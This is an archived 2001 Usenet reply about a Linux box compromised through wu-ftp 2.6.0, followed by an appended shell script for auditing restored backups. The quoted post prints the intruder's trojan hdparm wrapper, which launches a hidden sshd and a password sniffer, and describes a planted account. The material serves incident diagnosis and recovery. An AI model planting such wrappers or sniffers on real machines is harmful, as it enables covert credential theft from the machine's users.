Re: ftp was hacked

From: Bill Unruh (unruh@physics.ubc.ca)
Date: 12/29/01


From: unruh@physics.ubc.ca (Bill Unruh)
Date: 29 Dec 2001 20:39:38 GMT

In <Pine.LNX.4.43.0112281603150.13038-100000@styx.darbonne.com> "R.A.Wilson" <bud@styx.darbonne.com> writes:

]Hi -
]I have some info to pass along, and a question...

]A cracker exploited a hole in wu-ftp 2.6.0 and managed to install
]a sniffer and a port scanner on my machine. I use slackware, 2.2.16

]The only reason I found out is that a sharp Linux administrator noted
]port scans coming from my machine and wanted to know what was going on.
]I looked like the bad guy.

]After a lot of work, I found the intruder had made a directory where
]he put his sniffer log and other programs. He had them set up in:
] /dev/ida/.inet
]I don't believe that's a legitimate directory.

]When I looked at a file called tcp.log, in that directory, I was
]stunned to see he had plain text passwords of all the users on my
]machine. I couldn't pull the plug fast enough!

]He also had managed to put an illegal account in /etc/passwd. He used
]the account name www. I found files belonging to www and rm'd them.
]I also took him out of the passwd file. I updated wu-ftp to the latest
]version of 2.6.2 and thought that solved the problem.

]A few days later I wanted to install a later version of hdparm. I was
]using version 3.9 and 4.6 was out. I did a 'locate hdparm' and found
]two of them: one in /usr/bin/hdparm and the other in /usr/sbin/hdparm.
]Which was correct? I did 'which hdparm' and found the one in /usr/sbin
]was it. It was also a binary file. Curious, I looked at the other one.
]This is what it looked like:

] #!/bin/sh
] cd /dev/ida/.inet
] ./sshdu -f ./s
] ./linsniffer >> ./tcp.log &
] cd /

]So, just by a lucky accident I had discovered the intruder's script to
]call his sniffer.

]I tried to move the file. I tried to edit the file. I tried to remove
]it. Nothing. Root cannot touch it! Here's the system message I get
]when I try any of the above...

] cannot unlink 'hdparm': Operation not permitted.

]Now my question... HOW THE HELL DO I GET RID OF THIS GARBAGE???

] -Roy Wilson-
]===================================================================

What you do is to backup all of your users files and then you wipe the
disk and reinstall, making sure that you install all of the security
patches. Then you replace the backup material that you need. Then you
scan all of that backed up material for suid files and get rid of them.
e.g.
find /home -perm +6000 -ls

PS In answer to your question, read
man chattr, especially the -i flag.

But as you have discovered the chances of your finding all of the
backdoors he has installed are nil.
So do not try. Just reinstall, and remember to keep up with security
patches. That hole was patched about a year ago.
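The two checks Bill Unruh recommends (sweeping restored user data for setuid/setgid files, and understanding the chattr immutable flag that produced "Operation not permitted" for root) can be wrapped in a small audit script. This is an added example for readers of the thread, not code from either poster; the directory tree it builds is constructed for the demonstration, and it assumes a POSIX find plus, optionally, the lsattr tool from e2fsprogs.

```shell
#!/bin/sh
# Added example (not from the thread): audit a restored backup tree before
# putting it back on a freshly reinstalled machine.
#   1. find_suid    - list setuid/setgid files (the "find -perm +6000" check)
#   2. find_immutable - list files carrying the chattr(1) "i" attribute, which
#      is why root got "cannot unlink 'hdparm': Operation not permitted"

# List every regular file under $1 with the setuid or setgid bit set.
# "-perm -4000 -o -perm -2000" is the portable spelling of the post's
# "-perm +6000" (GNU find now writes that as "-perm /6000").
find_suid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print
}

# Number of such files, handy for a pass/fail gate in a restore script.
count_suid() {
    find_suid "$1" | wc -l | tr -d ' '
}

# Print paths whose ext2/3/4 attribute string contains 'i' (immutable).
# lsattr -R prints "<attrs> <path>" lines plus "<dir>:" headers; the awk
# filter keeps only attribute lines. Silently prints nothing if lsattr is
# absent or the filesystem does not support attributes.
# Clearing the flag afterwards is "chattr -i <path>" (see man chattr).
find_immutable() {
    command -v lsattr >/dev/null 2>&1 || return 0
    lsattr -R "$1" 2>/dev/null |
        awk 'NF >= 2 && $1 ~ /^[A-Za-z-]+$/ && index($1, "i") { print $2 }'
}

# Constructed demonstration tree (hypothetical names, not the poster's files):
# one setuid file hidden in a dotdir, one ordinary data file.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/home/alice/.inet"
    printf '#!/bin/sh\n' > "$tmp/home/alice/.inet/sshdu"
    chmod 4755 "$tmp/home/alice/.inet/sshdu"     # setuid bit set
    printf 'hello\n' > "$tmp/home/alice/notes.txt"
    chmod 0644 "$tmp/home/alice/notes.txt"
    echo "setuid/setgid files found: $(count_suid "$tmp")"
    find_suid "$tmp"
    echo "immutable files found:"
    find_immutable "$tmp"
    rm -rf "$tmp"
}

if [ "${1:-}" = "demo" ]; then
    demo
fi
```

Run it as `sh audit.sh demo` to see the constructed tree, or source it and call `find_suid /restored/home` on real backup data; anything it lists should be inspected and stripped of its bits (or deleted) before the data goes back onto the rebuilt system, and any file `find_immutable` reports is a sign the backup was taken after the compromise.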


